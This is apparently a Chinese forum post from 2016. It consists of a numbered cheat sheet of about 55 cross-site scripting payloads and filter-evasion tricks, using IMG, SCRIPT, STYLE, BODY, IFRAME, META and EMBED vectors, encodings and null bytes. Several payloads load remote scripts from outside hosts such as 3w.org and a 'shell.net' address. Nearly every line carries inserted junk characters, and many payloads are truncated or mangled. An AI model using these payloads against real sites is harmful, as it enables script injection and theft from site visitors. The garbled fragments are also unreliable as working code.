(1)普通的XSS JavaScript注入6 f1 @2 }1 w# i7 I$ p9 n. ]3 k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! U% X4 D' M& C0 l( x$ s(99)另类弹框. a5 \0 r) ?/ ~1 {. @. R
<q/oncut=alert()>16 t q* c$ q2 R6 G
<s/onclick=alert()>b
: T5 p M: z7 {( T <XSS=" onclick="alert(1)//">clickme</SSX=">
/ E+ S6 h& I2 S5 F0 ], m6 ]& [ <zzz onclick=alert`1`>clickme</zzz> ( ]. ~% d' F# W( n- p- c- {
<a onclick=alert`1`>clickme</a>
- v) W6 [+ {8 c<a=">clickme</a=">
0 e- y! m. o" c<a=">clickme</a>
% P$ N5 ~# @9 q" ~, u5 w* {$ C<z=">clickme</z=">
* o+ v) o5 y+ b1 ?1 T+ c<z onclick=alert`1`>clickme</z>
* R) @ D% T( @5 h u
; \* ^1 ^$ [9 W(2)IMG标签XSS使用JavaScript命令. v' N# w3 n$ z @- E: p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* y& i) u( v7 K( H: ^
+ @ w2 A8 S- B! D7 G& z# S(3)IMG标签无分号无引号* w& m Z9 ^& s! u' b: \, \4 e
<IMG SRC=javascript:alert(‘XSS’)>6 ~3 Z) v: L! [- V6 r4 L
D D3 K1 X8 n+ T) y(4)IMG标签大小写不敏感$ G* V7 z# i* v$ a/ C5 a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) w# w+ N1 m' C6 B* O
, y2 ?+ N' q0 P) H% _0 K(5)HTML编码(必须有分号)
1 @5 O5 k# M& x<IMG SRC=javascript:alert(“XSS”)>7 D+ [) R" j8 h4 C& a
9 R: W6 T& G$ }9 R4 Y* K9 |(6)修正缺陷IMG标签) g8 M6 E- F5 f# n% H- N0 f, p
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& N S/ B, J% o: Y- V
; _( G& A0 E& `* z* p7 }(7)formCharCode标签(计算器)
" c0 G7 p8 O; b( x<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ Z8 x" a3 u! c. N$ W. Q& i/ H
" Q9 b* o8 w8 b(8)UTF-8的Unicode编码(计算器)8 i: W$ ^1 q& V: A8 U0 M$ h
<IMG SRC=jav..省略..S')>
( p: |; @: _) r; b/ u" p8 L' a7 M0 c& c) w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" x' k1 X* k d9 @8 P5 [1 J1 T, s<IMG SRC=jav..省略..S')>
2 X1 _5 i) W" F4 {( [) k7 V+ R1 O" \. A& @8 |8 W! q
(10)十六进制编码也是没有分号(计算器)% g6 i2 V2 M4 ]& ~4 h/ r
<IMG SRC=\'#\'" /span>
: H% ]" [* F" f3 J0 F/ {. D1 {! }" Z9 \/ `% P# j3 j3 D7 h
(11)嵌入式标签,将Javascript分开. R5 O w, \( V* g2 v% d. m) R
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; G/ g9 F7 L: H- P" w
0 X- ` I; u3 M8 ^(12)嵌入式编码标签,将Javascript分开8 `: R! D/ O7 |$ t H4 L- y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ B( ~5 w* @6 |
. K6 b' Z# g' E% s(13)嵌入式换行符
3 A. d5 @. E. W, _$ T) n6 Y1 u<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, t5 @$ j+ v# ]7 T- I' |, `3 x9 y Q# _6 l
(14)嵌入式回车6 O' v2 z2 Y6 o! J
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 m8 Q$ R- Y# ^. D) E$ v! o0 Y9 W+ P* R
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& i' m. A+ F* a1 o: u3 ? f5 O<IMG SRC=\'#\'" /span>2 B9 Q3 X/ }$ g# C% Q& l/ `
& B8 q* i) w8 m
(16)解决限制字符(要求同页面)
4 n- e N$ b: o* x& R<script>z=’document.’</script>: q+ h. ^- D& ?' G( j
<script>z=z+’write(“‘</script>$ A" ^, j6 d. A w7 n8 _! h; c8 A
<script>z=z+’<script’</script>
; s$ d& k6 h1 s9 u% N<script>z=z+’ src=ht’</script>8 k7 A2 V9 \* B) c H* h0 C& Q
<script>z=z+’tp://ww’</script>
( n& m9 z' N% r D# f* L/ Q7 Q<script>z=z+’w.shell’</script>
% S% d n. m7 Z; C<script>z=z+’.net/1.’</script>
% q% @) f: ]; ] b<script>z=z+’js></sc’</script>. b' j5 o, k# a/ n- y8 c
<script>z=z+’ript>”)’</script>. @, n$ F; A. o0 ?3 e& T6 `
<script>eval_r(z)</script>
N' W) y0 ]/ p+ y: Z% s) t/ p, r3 C4 I
(17)空字符. Z2 d" J# e5 G- u
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, l, L% }; I7 @+ z( d5 {
- R# s7 Y/ b/ M(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: o, l# m0 S; D5 H( _% w3 F5 L6 Pperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 r3 q7 H, E% ]$ o/ Q: V' U
4 N5 a' Y- N! z2 E) `$ j. d0 k(19)Spaces和meta前的IMG标签
, Q" @* u5 C5 F) d2 I1 G<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
p* R U5 o# a; J* I0 [5 J6 C3 ^6 N- a6 y, N: n
(20)Non-alpha-non-digit XSS' {; `) M- P$ }2 r" W
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>* [: [: k1 J7 E. }/ W
5 p, O8 l3 M: h1 s) b) V
(21)Non-alpha-non-digit XSS to 2
+ G: k1 K: V! z, b& q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- _ E) S1 C2 T. @8 t( V6 {2 {
" K3 I8 g4 m+ \. }8 m(22)Non-alpha-non-digit XSS to 39 c7 D) x7 R, w4 ^
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
* o( ?* h2 u& Q) T
- V7 x8 Y% u p1 Q: `(23)双开括号
% D: h- n# r4 c2 t<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 [! O# _- e" G* k( M {8 ?1 l& E
* v; Y N7 ~! S& H
(24)无结束脚本标记(仅火狐等浏览器)
0 f; o) k7 e/ z9 j' ?<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& y4 v* f9 U7 s+ f1 t, H" ^5 s& n8 }# ^
(25)无结束脚本标记29 V7 S1 |# y7 \/ [/ C, _
<SCRIPT SRC=//3w.org/XSS/xss.js>0 x: ^5 N) _! w7 F v9 x* n% f' y
% ^4 s! m6 n8 r, i" k
(26)半开的HTML/JavaScript XSS0 ^; |! E( B5 f( D
<IMG SRC=\'#\'" /span>
" Z! Z q2 m6 ~9 v7 D
: B. S G- ], s(27)双开角括号
( H0 {) ]9 |+ v+ w. f# H+ W& Y<iframe src=http://3w.org/XSS.html <
( D9 v4 x% Y# @% b4 V( \6 I$ f/ K& L2 W
) b! |5 ~* @6 B) R(28)无单引号 双引号 分号
8 v: G" d7 G# X2 `4 }4 l5 w0 ]# i8 ~<SCRIPT>a=/XSS/8 q* X o3 u- ?4 }- w- B+ q
alert(a.source)</SCRIPT>% T1 }; C4 ?9 F+ t& G
2 F- I# C/ ?4 f4 \! C( N(29)换码过滤的JavaScript
. o6 I. q) v! G. N2 E% q\”;alert(‘XSS’);//
. {# A! a& D% C, I& _
2 H- [3 S2 L; d' {1 [. V5 Z(30)结束Title标签
2 G4 I8 S, r9 R% L% h</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& K# P$ [ L2 o/ f5 G' W" G# @
. H6 ]) a- m$ K& U) |
(31)Input Image. i( c+ y) I5 J; O% w
<INPUT SRC=\'#\'" /span>! `6 S, g* N( O; `0 ^! x& P
- H2 q) S: b4 {& O
(32)BODY Image
4 p" _4 R8 |. I9 }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 j- ?* ~* z2 K$ Y. n, y& v% v( |4 A( x5 G- p$ S0 y
(33)BODY标签
0 g/ ]8 {# ]. ^- L2 z/ |<BODY(‘XSS’)>; Q* D' O+ X9 ^
) w& u6 Q$ M4 w& }- D4 w9 P7 S
(34)IMG Dynsrc! B! S" v% Z. ~4 Q# l' n
<IMG DYNSRC=\'#\'" /span>+ ]+ O8 z! G: r0 S4 O
1 H# R& V$ j! C$ @(35)IMG Lowsrc
6 ?; {0 [) R" m1 q<IMG LOWSRC=\'#\'" /span>
$ c* Z% h' r1 B5 Q8 X6 }0 x
2 S0 q- J; Q, Q ^(36)BGSOUND
# i% u) \1 ` `& `<BGSOUND SRC=\'#\'" /span>
; W+ J6 A. p& a1 r4 ]/ l# w" l5 a' ~7 I# ~& E, f5 C1 N- E6 @
(37)STYLE sheet2 [, }' o0 K/ F2 H# b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 z% O& T0 j$ f% U) b. e3 D# q, i6 F4 s( j
; r# l8 M/ p8 e' i5 h6 K+ L+ z
(38)远程样式表, w U( i/ F+ k# E3 d. Y$ \
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 ]3 s9 y+ D/ w2 d" M
; g4 n4 s8 }- I! T2 F- f& C(39)List-style-image(列表式)5 K6 o7 J% |( n. [- b! i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* f/ X! B+ R$ w1 u @6 x* y7 C
9 J6 G7 v9 b5 m9 ~(40)IMG VBscript
6 u+ l: U! S+ Z<IMG SRC=\'#\'" /STYLE><UL><LI>XSS4 `7 ~7 W; ]) n9 _
- z! o2 l- G4 b. v
(41)META链接url
, ^4 O3 y3 [' j% L* S4 S<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>. Y: c& ]* J& x( D& n+ O: E: W
/ g% b5 X- z. W6 N q. x
(42)Iframe) o* j( W7 [7 l6 }% W* s' C
<IFRAME SRC=\'#\'" /IFRAME>
7 ]2 f5 ?5 ]+ |& i9 G3 S7 d$ H: ?7 `3 a( ]1 V6 U( c
(43)Frame! s7 Z# @; F0 i( X; j: V) @ D7 j
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
$ u$ [& I- ^) b" F* j$ {# g4 }5 p
h( O% w. b- z2 o3 U- [: j+ N" t(44)Table
: R8 T, H4 P5 b/ @( p& l<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 j$ w# ^& F" R0 u
5 w0 n/ b' \& O U! Y3 I1 ](45)TD
8 c4 b; R$ R/ ?5 ]<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) H5 z: \# [8 i6 Z
: @" \6 ]* r" o% n5 ?(46)DIV background-image
6 E8 [2 t8 _) Q) S) Z8 ~<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 [+ K; T/ G: M( H+ d
" z6 A! k9 ]( G1 g1 ~ j# g' R \(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)/ A( [/ }: }/ ]% F, x
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>" M5 I8 g0 ~1 G, j3 M! P; ]
: u1 h1 R7 P9 M2 {
(48)DIV expression0 ^ [: i) q: N6 i; K
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) H* V% h0 F9 e
. C. f% n, o3 G' c- f. v# Z(49)STYLE属性分拆表达
" f2 h. z" W" Z<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; f( z) W+ E( { x: L, b( M! H0 t- q! g: O
(50)匿名STYLE(组成:开角号和一个字母开头)* Q$ N# E7 i8 h9 F! {" G+ @; z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! u4 J6 v0 T) q8 {( }7 L0 z- W9 D( O' }
: F+ u+ l' X0 R; [
(51)STYLE background-image8 i) u' y1 ?/ A8 h6 L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& G$ a" r: {' o' s6 p
- I: l! K @7 c1 w(52)IMG STYLE方式
8 l6 y; t8 M8 Y a# Sexppression(alert(“XSS”))’>
+ `% R, |! f# A' {6 v: M* } p# C$ p5 M9 `
(53)STYLE background/ g: q0 q5 d+ `5 t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! G4 f* y1 ]% K5 d" X( H" N5 n& k6 n- g5 w! D1 \0 r# f
(54)BASE
2 B: r& D: ?% Y; l<BASE HREF=”javascript:alert(‘XSS’);//”>
" f6 G, l; L! ]7 d
* C& f+ V" d' B* P# G(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 _0 O7 R! G" [. D
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
+ S B& G! w7 f) C) Z5 K- u7 L |
发表于 2016-4-28 10:06:15
收藏
支持
反对